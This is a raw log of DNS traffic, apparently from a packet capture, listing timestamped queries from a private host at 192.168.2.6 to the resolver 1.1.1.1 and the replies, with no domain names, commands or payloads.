                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.923680067 CET5157853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.924007893 CET6502453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.924186945 CET5946353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.929876089 CET6403753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.930363894 CET5911353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.931302071 CET6391853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.931421041 CET5326453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.932573080 CET53507701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.932651997 CET5481053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.932956934 CET5107053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.932956934 CET5353353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.933310032 CET53538791.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.933324099 CET53650241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.933641911 CET53515781.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.934282064 CET53646011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.934662104 CET5553053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.935009956 CET5943753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.935286999 CET53594631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.936816931 CET5164553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.936939001 CET5565553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.937114000 CET5155653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.937792063 CET5782553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.938445091 CET5610253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.939040899 CET5279653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.939616919 CET6535653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.940280914 CET53640371.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.940352917 CET6165953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.940359116 CET53591131.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.941092968 CET5309853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.941097021 CET53532641.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.942464113 CET6384953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.943368912 CET53535331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.945297003 CET6288053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.945969105 CET53555301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.946369886 CET53516451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.947618008 CET53515561.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.947695971 CET53578251.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.948152065 CET53556551.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.949703932 CET53616591.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.950565100 CET53653561.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.952284098 CET53548101.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.952294111 CET53638491.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.955398083 CET53628801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.962117910 CET53639181.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.965176105 CET53510701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.965455055 CET53594371.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.970374107 CET53561021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.970706940 CET53527961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.972506046 CET53530981.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.091742039 CET5569953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.093242884 CET5164453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.097095013 CET6460153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.098541021 CET6079053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.099153042 CET6211253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.099833012 CET5427353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.100966930 CET53556991.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.102901936 CET53516441.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.106515884 CET53607901.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.106527090 CET53646011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.109582901 CET53542731.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.110142946 CET53621121.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.116739035 CET6102053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.117013931 CET5618253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.126447916 CET53610201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.131731033 CET5935453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.132460117 CET6244353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.135940075 CET53561821.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.140542984 CET5498653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.140784025 CET4916153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.141047955 CET5535353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.141236067 CET5852953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.142420053 CET53624431.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.151768923 CET53491611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.154117107 CET5738753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.159502029 CET6483153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.160288095 CET6051753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.160830975 CET6328953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.161756039 CET6482453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.162058115 CET5617753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.164088011 CET53573871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.164387941 CET53593541.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.165249109 CET5193753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.165657043 CET6465753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.166671991 CET5000153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.166709900 CET5596553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.166915894 CET5308553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.168169022 CET5229953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.169223070 CET6500453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.169253111 CET53561771.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.169264078 CET53648311.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.169935942 CET5393453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.171504021 CET53632891.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.171710968 CET53648241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.172005892 CET53519371.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.172063112 CET53553531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.172072887 CET53585291.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.173027992 CET53549861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.176359892 CET53646571.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.176398039 CET53530851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.177973032 CET53522991.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.178251028 CET53650041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.179398060 CET53539341.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.182012081 CET6045353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.183120012 CET5283553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.183568954 CET6121253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.187236071 CET6349253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.187482119 CET5442953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.187705040 CET6152753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.187939882 CET5887553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.192068100 CET53605171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.192078114 CET53528351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.193635941 CET53612121.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.194380999 CET53604531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.197357893 CET53615271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.197444916 CET5214853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.197638988 CET53544291.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.197657108 CET53500011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.197762012 CET5860453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.197937012 CET53559651.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.206269026 CET53521481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.209325075 CET53586041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.217603922 CET6313953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.217987061 CET6250253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.218008041 CET6249553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.218405962 CET5929053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.218535900 CET5418053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.218643904 CET5783353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.218643904 CET5754753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.218755007 CET5600953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.218818903 CET53588751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.218827963 CET6323053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.219049931 CET6308253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.219049931 CET5968553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.219152927 CET53634921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.219275951 CET5367553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.222399950 CET5290653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.222682953 CET5033753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.222847939 CET5579153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.223020077 CET5411953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.223159075 CET5467153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.223453045 CET6023453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.223608017 CET4967453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.223661900 CET6126353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.223831892 CET5622553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.223831892 CET6460853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.224250078 CET5122653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.224824905 CET6503153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.227983952 CET53625021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.228164911 CET53592901.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.228532076 CET53631391.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.228543043 CET53560091.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.228863001 CET53536751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.229362965 CET53575471.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.229378939 CET53632301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.230649948 CET53541191.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.232594967 CET53503371.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.232606888 CET53650311.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.232916117 CET53529061.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.233689070 CET53602341.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.234399080 CET53562251.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.234409094 CET53512261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.234720945 CET53496741.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.234873056 CET53612631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.235025883 CET53646081.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.248671055 CET53624951.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.251173973 CET53578331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.251332998 CET53541801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.251954079 CET53630821.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.251964092 CET53596851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.253817081 CET53557911.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.254549980 CET53546711.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.291924000 CET6283653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.292927980 CET6081153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.302390099 CET53608111.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.303423882 CET53628361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.402395010 CET5652353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.425699949 CET53565231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.841571093 CET5274053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.844367027 CET5777653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.846759081 CET6285653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.848562956 CET5598653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.853858948 CET6204053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.854793072 CET5652853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.855395079 CET5571653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.855395079 CET5469953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.855799913 CET5846353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.856405973 CET6538653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.856795073 CET5915853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.856971025 CET5030853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.858042002 CET6337953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.858042002 CET6239253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.859110117 CET6453853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.859719038 CET5864753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.860060930 CET6156953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.860277891 CET5084553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.860716105 CET5062753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.860940933 CET6454953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.862004995 CET5117153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.862004995 CET6386253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.862668037 CET4958153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.863270044 CET5047353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.865431070 CET5948953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.866702080 CET6021053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.867305994 CET5267553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.868217945 CET4916853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.868768930 CET6353753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.871107101 CET6003253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.871107101 CET6243553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.873013020 CET5093253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.874579906 CET6089653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.876377106 CET5167253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.879574060 CET5481053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.879574060 CET5767853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.881223917 CET5287553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.882647038 CET5388553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.884524107 CET5691753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.886239052 CET5224253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.888320923 CET6154553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.890258074 CET5686053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.890980959 CET6030653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.893294096 CET6293053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.893294096 CET5128753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.894844055 CET5089853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.895268917 CET5036053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.895834923 CET5511953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.896425009 CET6028353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.898469925 CET6229153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.898469925 CET6091453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.899246931 CET6316653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.901226997 CET5971253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.901583910 CET5386353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.903148890 CET5660153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.903148890 CET5086853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.904652119 CET5764953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.905456066 CET4965453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.905951023 CET6374653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.907182932 CET4933353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.907182932 CET6536253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.908123016 CET5321853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.908818007 CET6084253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.908976078 CET5974053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.112588882 CET53577761.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.113267899 CET53623921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.113312960 CET53586471.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.114712000 CET53516721.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.114783049 CET53591581.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.114862919 CET53645381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.115174055 CET53559861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.115185022 CET53584631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.115461111 CET53527401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.115487099 CET53557161.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.115748882 CET53506271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.115758896 CET53653861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.115850925 CET53546991.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.116349936 CET53565281.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.116810083 CET53633791.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.117441893 CET53645491.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.117453098 CET53522421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.117461920 CET53495811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.117471933 CET53511711.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.117486000 CET53615451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.117496014 CET53624351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.117505074 CET53503081.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.117515087 CET53635371.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.117523909 CET53576491.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.117532969 CET53512871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.118015051 CET53508981.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.118025064 CET53629301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.118035078 CET53526751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.118045092 CET53493331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.118060112 CET53496541.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.118068933 CET53569171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.118078947 CET53602831.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.118942976 CET53608421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.118952990 CET53503601.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.118962049 CET53653621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.119601965 CET53548101.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.119618893 CET53551191.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.119837999 CET53538631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.119848013 CET53594891.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.120868921 CET53508681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.125905037 CET53608961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.126437902 CET53597401.1.1.1192.168.2.6
